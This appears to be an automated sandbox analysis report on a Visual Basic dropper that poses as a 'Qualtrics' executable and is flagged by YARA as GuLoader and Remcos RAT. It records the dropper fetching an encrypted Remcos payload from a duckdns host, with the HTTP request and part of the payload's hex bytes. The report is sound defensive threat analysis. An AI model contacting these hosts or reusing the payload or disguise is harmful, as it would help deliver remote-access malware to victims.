              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              scasd
              add byte ptr [eax], al
              add byte ptr [eax+00h], dl
              add byte ptr [eax], al
              add byte ptr [eax+eax], cl
              inc esi
              dec edi
              push edx
              push esp
              dec edx
              inc ebp
              dec esi
              inc ebp
              push ebx
              push esp
              inc ebp

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x2a2140x28.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xbea.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x198.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x298640x2a000False0.506946382068data6.92804161947IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .data0x2b0000x11e80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc0x2d0000xbea0x1000False0.253173828125data3.21209329916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              CUSTOM0x2d9900x25aASCII text, with CRLF line terminatorsEnglishUnited States
              RT_ICON0x2d8600x130data
              RT_ICON0x2d5780x2e8data
              RT_ICON0x2d4500x128GLS_BINARY_LSB_FIRST
              RT_GROUP_ICON0x2d4200x30data
              RT_VERSION0x2d1a00x280dataEnglishUnited States

              Imports

              DLLImport
              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, __vbaVarTstLt, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaR4Str, __vbaI2I4, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

              Version Infos

              DescriptionData
              Translation0x0409 0x04b0
              InternalNameSrklasse4
              FileVersion1.04
              CompanyNameQualtrics
              CommentsQualtrics
              ProductNameQualtrics
              ProductVersion1.04
              FileDescriptionQualtrics
              OriginalFilenameSrklasse4.exe

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              09/27/21-14:57:47.315553UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499588.8.8.8192.168.2.7
              09/27/21-14:57:48.635027UDP254DNS SPOOF query response with TTL of 1 min. and no authority53508608.8.8.8192.168.2.7

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2021 14:57:47.350785017 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.463856936 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.464104891 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.465127945 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.578341961 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.578381062 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.578398943 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.578416109 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.578430891 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.578505039 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.578546047 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.690390110 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690427065 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690449953 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690466881 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690485954 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690504074 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690517902 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.690521955 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690558910 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.690594912 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.690618038 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690635920 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.690679073 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.802376986 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802423954 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802452087 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802475929 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802501917 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802524090 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802524090 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.802566051 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802575111 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.802589893 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802591085 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.802618980 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.802630901 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.802670956 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.804008961 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804047108 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804071903 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804091930 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804111958 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804124117 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804142952 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804162979 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804172993 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.804683924 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.914715052 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.914762974 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.914791107 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.914814949 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.914835930 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.914854050 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.914988995 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.915056944 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.915087938 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915136099 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915169954 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915191889 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915219069 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915242910 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915263891 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915283918 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915307045 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915329933 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915369034 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915390015 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915405989 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.915401936 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.915437937 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.915452003 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.916304111 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916440964 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.916490078 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916513920 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916532993 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916591883 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916614056 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916635036 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916656017 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916655064 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.916681051 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916698933 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916735888 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.916826010 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916825056 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:47.916837931 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:47.916981936 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.027556896 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.027601004 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.027731895 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.027760029 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.027785063 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.027807951 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.027832031 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.028039932 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.028068066 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.028091908 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.028114080 CEST804989223.146.242.85192.168.2.7

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2021 14:53:40.019715071 CEST5183753192.168.2.78.8.8.8
              Sep 27, 2021 14:53:40.038727045 CEST53518378.8.8.8192.168.2.7
              Sep 27, 2021 14:53:56.642399073 CEST5541153192.168.2.78.8.8.8
              Sep 27, 2021 14:53:56.714075089 CEST53554118.8.8.8192.168.2.7
              Sep 27, 2021 14:54:13.171747923 CEST6366853192.168.2.78.8.8.8
              Sep 27, 2021 14:54:13.185282946 CEST53636688.8.8.8192.168.2.7
              Sep 27, 2021 14:54:49.375288963 CEST5464053192.168.2.78.8.8.8
              Sep 27, 2021 14:54:49.444178104 CEST53546408.8.8.8192.168.2.7
              Sep 27, 2021 14:54:50.523938894 CEST5873953192.168.2.78.8.8.8
              Sep 27, 2021 14:54:50.603393078 CEST53587398.8.8.8192.168.2.7
              Sep 27, 2021 14:54:51.122011900 CEST6033853192.168.2.78.8.8.8
              Sep 27, 2021 14:54:51.135569096 CEST53603388.8.8.8192.168.2.7
              Sep 27, 2021 14:54:51.475680113 CEST5871753192.168.2.78.8.8.8
              Sep 27, 2021 14:54:51.488689899 CEST53587178.8.8.8192.168.2.7
              Sep 27, 2021 14:54:52.002674103 CEST5976253192.168.2.78.8.8.8
              Sep 27, 2021 14:54:52.083827972 CEST53597628.8.8.8192.168.2.7
              Sep 27, 2021 14:54:52.514565945 CEST5432953192.168.2.78.8.8.8
              Sep 27, 2021 14:54:52.528856993 CEST53543298.8.8.8192.168.2.7
              Sep 27, 2021 14:54:52.560240030 CEST5805253192.168.2.78.8.8.8
              Sep 27, 2021 14:54:52.589730978 CEST53580528.8.8.8192.168.2.7
              Sep 27, 2021 14:54:53.090322018 CEST5400853192.168.2.78.8.8.8
              Sep 27, 2021 14:54:53.103915930 CEST53540088.8.8.8192.168.2.7
              Sep 27, 2021 14:54:53.760950089 CEST5945153192.168.2.78.8.8.8
              Sep 27, 2021 14:54:53.774543047 CEST53594518.8.8.8192.168.2.7
              Sep 27, 2021 14:54:54.595487118 CEST5291453192.168.2.78.8.8.8
              Sep 27, 2021 14:54:54.609592915 CEST53529148.8.8.8192.168.2.7
              Sep 27, 2021 14:54:55.214437008 CEST6456953192.168.2.78.8.8.8
              Sep 27, 2021 14:54:55.274261951 CEST53645698.8.8.8192.168.2.7
              Sep 27, 2021 14:55:01.889481068 CEST5281653192.168.2.78.8.8.8
              Sep 27, 2021 14:55:01.909058094 CEST53528168.8.8.8192.168.2.7
              Sep 27, 2021 14:55:34.090076923 CEST5078153192.168.2.78.8.8.8
              Sep 27, 2021 14:55:34.103554964 CEST53507818.8.8.8192.168.2.7
              Sep 27, 2021 14:55:34.227729082 CEST5423053192.168.2.78.8.8.8
              Sep 27, 2021 14:55:34.241355896 CEST53542308.8.8.8192.168.2.7
              Sep 27, 2021 14:56:09.455324888 CEST5491153192.168.2.78.8.8.8
              Sep 27, 2021 14:56:09.470839977 CEST53549118.8.8.8192.168.2.7
              Sep 27, 2021 14:57:47.200725079 CEST4995853192.168.2.78.8.8.8
              Sep 27, 2021 14:57:47.315552950 CEST53499588.8.8.8192.168.2.7
              Sep 27, 2021 14:57:48.519510984 CEST5086053192.168.2.78.8.8.8
              Sep 27, 2021 14:57:48.635026932 CEST53508608.8.8.8192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Sep 27, 2021 14:57:47.200725079 CEST192.168.2.78.8.8.80xd3d3Standard query (0)dypage.duckdns.orgA (IP address)IN (0x0001)
              Sep 27, 2021 14:57:48.519510984 CEST192.168.2.78.8.8.80xe898Standard query (0)dyn-wave.duckdns.orgA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Sep 27, 2021 14:57:47.315552950 CEST8.8.8.8192.168.2.70xd3d3No error (0)dypage.duckdns.org23.146.242.85A (IP address)IN (0x0001)
              Sep 27, 2021 14:57:48.635026932 CEST8.8.8.8192.168.2.70xe898No error (0)dyn-wave.duckdns.org23.146.241.70A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • dypage.duckdns.org

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.74989223.146.242.8580C:\Users\user\Desktop\DW1VgsgHNU.exe
              TimestampkBytes transferredDirectionData
              Sep 27, 2021 14:57:47.465127945 CEST8143OUTGET /remcos_d_QUBXVO174.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: dypage.duckdns.org
              Cache-Control: no-cache
              Sep 27, 2021 14:57:47.578341961 CEST8144INHTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Last-Modified: Sun, 26 Sep 2021 08:30:43 GMT
              Accept-Ranges: bytes
              ETag: "119daccbb0b2d71:0"
              Server: Microsoft-IIS/8.5
              Date: Mon, 27 Sep 2021 12:57:47 GMT
              Content-Length: 469056
              Data Raw: 85 72 65 da fa 84 5d ef 15 48 c7 41 95 63 98 4c 63 5c 6a c2 3d 2e 3a e3 ec 0a 1a e6 db fd dd c6 fc 00 3b 08 52 f8 0f c5 51 c6 12 00 b4 f2 2d 4e 7c 5c d4 19 c5 66 d6 f6 9f 3d 55 40 d3 5a 1a 51 5a d4 5a b4 d7 4e 5d 9c c8 d6 64 64 7a 23 4e b3 10 1b 3f a3 f8 15 94 93 f4 27 de 3a 43 d1 26 a4 f0 36 5e ef 78 e6 dd 4b 1f 40 e0 5b 05 12 8e e3 b3 6a a2 48 8d fe 13 86 0f 01 3b e4 e7 fd 24 3b ff 58 78 e6 91 3f 5c 9d 54 a0 ce 0d 92 64 eb 2a a5 20 4e 5b af bc 28 bf fd 7a be ad ff 17 f6 14 28 9a 4e e8 85 5c 75 ba f0 cb c4 71 50 13 15 48 bb a5 eb 21 ea 51 9b 09 ed 8f 8a 15 22 80 64 de 02 97 bf eb 22 b7 53 85 85 5a ef 47 43 0f 28 50 b0 b6 89 91 4a ee da 68 54 01 3a 07 44 0b 84 c7 5d 03 b4 2c d3 60 48 3a 57 8a 60 f0 13 1b 25 b2 dd 4f 24 c9 5c d8 f8 1a 16 55 10 a7 0e b2 54 2f a0 98 39 61 7b f9 b4 7c f8 42 d5 70 8f e6 76 71 ef 68 15 89 cd 1e 6d c2 b9 63 39 60 81 3b 84 83 e6 65 a4 60 1c f9 40 62 30 ec 9b 64 2f 73 33 54 d5 d7 b0 18 f1 a5 0d ac f0 83 ad 9f 76 4d 5d b4 c2 61 85 30 38 73 17 4b a0 a1 b5 65 79 f0 61 e1 60 a1 1e d1 24 bd b4 05 19 90 e9 05 d7 44 28 e4 97 cd ac fc aa 02 9f 88 c3 a4 c3 72 50 c0 fb d6 27 91 93 b6 64 e7 f7 e7 5d b9 e7 98 74 69 ba 95 5e 8b b2 e6 26 eb 31 e7 d8 dd 04 f3 55 41 c1 a2 41 92 b2 9e 38 57 6f 03 59 51 3c 1c 24 99 eb 85 2d 95 35 b2 95 38 b4 f4 5d 94 d2 1d de 01 ad cd 3b cd f0 c3 c1 7c cd ac e1 25 d4 79 b4 d3 9f 42 16 8c 4f 82 14 1d cd cf 60 8b f5 35 b4 40 ad 45 eb 32 6c 64 9a 18 41 3a 7c ce a2 35 9e 80 48 d5 d8 4b 8f 6d 11 8b 11 1f dc 9c 34 8c 45 89 b9 da 0b 2d d3 5f 03 2f 66 57 90 b3 e5 a2 3e 8f db af 0c 26 ed 66 f2 8b 4d 0d be 3c 01 c0 bf 4a cf 3b d0 a2 24 27 c7 e2 f3 f7 6c cc c5 4f 95 fc 69 f4 6a 33 21 ae 79 46 9f 63 df c5 d9 35 fd 2d 91 95 fa be eb 65 d4 8e 88 e0 49 61 c8 e5 c1 64 11 56 d2 78 da 5a a0 ef fe fb d1 e7 99 25 8e 71 ac 71 67 5f ac 3b a4 01 98 3b af 3a 18 4a e4 d1 09 01 df 3d 19 a6 2e 59 36 06 18 54 61 eb f4 7c 87 8f bf 74 1d 6e 45 de e3 8f c9 1d e8 64 86 8c c7 3f dc 31 83 17 1d a6 3a d1 d7 f7 1e 7f c5 f6 0f 47 9e fe e7 1c f6 9e fd 3e 12 b3 cb 57 60 c0 45 25 5f fb 5a 3d 19 ce a8 92 df 6b a1 6e 22 77 86 43 ec 70 7c 59 19 0d 5a 2d 62 c1 86 84 07 26 e3 fe 87 ff 40 fe f5 66 3b ec 6d 00 4c cc 91 69 ae d5 bd 75 a6 d5 8a 18 6f 66 20 93 e6 a1 6b 9b ac f5 34 83 6e b9 05 67 e8 ba 9a c9 75 cf e9 ba 3a 64 69 73 d2 14 2f cf 59 ce 2c 87 0b f5 22 c6 d3 3e 21 99 83 04 bd af fb 74 72 3d f1 bf d5 f5 73 1a f6 51 a8 e5 ed fb f7 3c 18 70 a3 a7 52 e4 41 cf bd f1 69 d6 d1 b9 4e 81 72 b4 2e 38 50 9e 73 f7 49 ee 52 35 1b 3e c4 0c da 83 50 12 b1 a0 8a 06 40 d2 4b 4b 80 be 32 9f ff c1 fa ed ec ac 2c d8 a9 18 d2 69 c8 86 30 ee 1a e1 61 08 2a 4a 37 dd 5a 48 41 d5 ac fa 8a e8 f1 49 f8 81 30 c4 c9 00 30 70 0b 57 5b 99 cb 09 e5 4f a2 fa c8 52 f2 5a 4e 80 dd 89 ad 4d 26 2f f7 72 18 24 b7 38 b5 02 e7 17 2e f3 f9 56 40 ce 8f 79 5b af c8 0c 15 17 8e ca b4 d4 4e 5d 9c cc d6 64 64 85 dc 4e b3 a8 1b 3f a3 f8 15 94 93 b4 27 de 3a 43 d1 26 a4 f0 36 5e ef 78 e6 dd 4b 1f 40 e0 5b 05 12 8e e3 b3 6a a2 48 8d fe 13 86 0f 01 3b e4 f7 fc 24 3b f1 47 c2 e8 91 8b 55 50 75 18 cf 41 5f 45 bf 42 cc 53 6e 2b dd d3 4f cd 9c 17 9e ce 9e 79 98 7b 5c ba 2c 8d a5 2e 00 d4 d0 a2 aa 51 14 5c 46 68 d6 ca 8f 44 c4 5c 96 03 c9 8f 8a 15 22 80 64 de a8 14 fd db cc 55 7f e6 6b b8 c3 24 ad ed 04 33 ea c8 54 f2 b6 0c f6 0b 0e 7f e5 64 0b e9 a8 a4 07 c4 8a 8f 65 82 8c 3a bf
              Data Ascii: re]HAcLc\j=.:;RQ-N|\f=U@ZQZZN]ddz#N?':C&6^xK@[jH;$;Xx?\Td* N[(z(N\uqPH!Q"d"SZGC(PJhT:D],`H:W`%O$\UT/9a{|Bpvqhmc9`;e`@b0d/s3TvM]a08sKeya`$D(rP'd]ti^&1UAA8WoYQ<$-58];|%yBO`5@E2ldA:|5HKm4E-_/fW>&fM<J;$'lOij3!yFc5-eIadVxZ%qqg_;;:J=.Y6Ta|tnEd?1:G>W`E%_Z=kn"wCp|YZ-b&@f;mLiuof k4ngu:dis/Y,">!tr=sQ<pRAiNr.8PsIR5>P@KK2,i0a*J7ZHAI00pW[ORZNM&/r$8.V@y[N]ddN?':C&6^xK@[jH;$;GUPuA_EBSn+Oy{\,.Q\FhD\"dUk$3Tde:


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:14:53:45
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\DW1VgsgHNU.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\DW1VgsgHNU.exe'
              Imagebase:0x400000
              File size:184320 bytes
              MD5 hash:B30B9C1D23026FF24F234A07A557DC83
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:low

              General

              Start time:14:55:44
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\DW1VgsgHNU.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\DW1VgsgHNU.exe'
              Imagebase:0x400000
              File size:184320 bytes
              MD5 hash:B30B9C1D23026FF24F234A07A557DC83
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, Author: Joe Security
              Reputation:low

              Disassembly

              Code Analysis

              Reset < >